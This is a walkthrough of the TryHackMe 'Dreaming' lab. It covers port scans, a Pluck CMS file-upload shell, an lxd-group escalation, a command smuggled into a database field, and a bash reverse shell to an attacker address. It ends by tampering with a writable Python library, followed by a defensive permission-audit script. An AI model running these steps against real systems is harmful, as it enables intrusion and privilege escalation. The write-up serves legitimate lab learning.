Dreaming TryHackMe Walkthrough | Easy + Unintended

Nmap -

> nmap -sVC -T4 10.10.251.54 -oN scans/nmap_initial

# Nmap 7.94 scan initiated Sat Nov 18 14:29:16 2023 as: nmap -v -sC -T4 -sV -oN scans/nmap_initial 10.10.251.54
Nmap scan report for 10.10.251.54
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 76:26:67:a6:b0:08:0e:ed:34:58:5b:4e:77:45:92:57 (RSA)
|   256 52:3a:ad:26:7f:6e:3f:23:f9:e4:ef:e8:5a:c8:42:5c (ECDSA)
|_  256 71:df:6e:81:f0:80:79:71:a8:da:2e:1e:56:c4:de:bb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 18 14:30:06 2023 -- 1 IP address (1 host up) scanned in 50.69 seconds

Gobuster (Dir Fuzz Output) -

> gobuster dir -u http://10.10.251.54 -w /usr/share/dirb/wordlists/common.txt -t 20 -o gobust.log

/app                 (Status: 301) [Size: 310] [--> http://10.10.251.54/app/]

Pluck 4.7.13 -> shell.phar file upload RCE

http://10.10.250.141/app/pluck-4.7.13/login.php
admin:password
http://10.10.250.141/app/pluck-4.7.13/files/shell.phar

www-data -> lucien

cd /opt
cat test.py
lucien:HeyLucien#@1999!

group lxd - unintended

on your machine

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
python3 -m http.server 80
  • Start a Python server and transfer the Alpine image to the box
cd /dev/shm; wget <tun0-ip>/alpine-v3.8-i686-20231118_1500.tar.gz
lxd init
lxc image import ./alpine*.tar.gz --alias voldemort
lxc init voldemort hogwarts -c security.privileged=true
lxc config device add hogwarts hogwarts disk source=/home/ path=/mnt/home recursive=true
lxc start hogwarts
lxc exec hogwarts /bin/sh
cd /mnt/home

Intended - history reveals lucien's MySQL creds

mysql -u lucien -plucien42DBPASSWORD
use information_schema;
select * from USER_PRIVILEGES;
  • lucien has INSERT / UPDATE permissions in the db
mysql> use library;
mysql> select * from dreams;
+---------+------------------------------------+
| dreamer | dream                              |
+---------+------------------------------------+
| Alice   | Flying in the sky                  |
| Bob     | Exploring ancient ruins            |
| Carol   | Becoming a successful entrepreneur |
| Dave    | Becoming a professional musician   |
+---------+------------------------------------+
4 rows in set (0.00 sec)

mysql> Insert into dreams (dreamer,dream) Values ('vold;/tmp/voldemort','n00b');
mysql> exit
cat << EOF > /tmp/voldemort
#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/<tun0-ip>/1337 0>&1'
EOF
sudo -u death python3 /home/death/getDreams.py

Edit /usr/lib/python3.8/shutil.py, because the death user has write permission on it

  • in the copy2() function add:
os.system("chmod +rwx /home/morpheus/morpheus_flag.txt")
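
An added audit example (not part of the original walkthrough) for the misconfiguration used in this last step, a standard-library module that an unprivileged account can write to: it lists Python modules under a library directory that are not owned by a trusted uid or that carry group/world write bits. The function names and the sample tree in demo() are constructed for illustration.

```python
import os
import stat
import sysconfig
import tempfile

def audit_module_tree(root, trusted_uids=frozenset({0})):
    """Return (path, reason) for every directory or module under root that a
    non-trusted account could modify: wrong owner, or group/world write bits."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in [""] + filenames:  # "" means: check the directory itself
            path = os.path.join(dirpath, name) if name else dirpath
            if name and not name.endswith((".py", ".pyc", ".so")):
                continue
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry
            if stat.S_ISLNK(st.st_mode):
                continue  # link permissions are meaningless; targets are audited in place
            reasons = []
            if st.st_uid not in trusted_uids:
                reasons.append(f"owner uid {st.st_uid}")
            if st.st_mode & stat.S_IWGRP:
                reasons.append(f"group-writable (gid {st.st_gid})")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if reasons:
                findings.append((path, ", ".join(reasons)))
    return sorted(findings)

def demo():
    """Constructed sample tree: one clean module, one group-writable module."""
    with tempfile.TemporaryDirectory() as root:
        os.chmod(root, 0o755)
        for name, mode in (("json_ok.py", 0o644), ("shutil.py", 0o664)):
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write("# constructed sample\n")
            os.chmod(path, mode)
        # The current uid stands in for root so the demo runs unprivileged.
        found = audit_module_tree(root, trusted_uids={os.getuid()})
        return [(os.path.basename(p), why) for p, why in found]

if __name__ == "__main__":
    stdlib = sysconfig.get_paths()["stdlib"]  # e.g. /usr/lib/python3.8
    for path, why in audit_module_tree(stdlib):
        print(f"{path}: {why}")
```

Run it with the same interpreter that privileged scripts or cron jobs use; any finding means another account can change code that those jobs import.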

Thanks for reading<3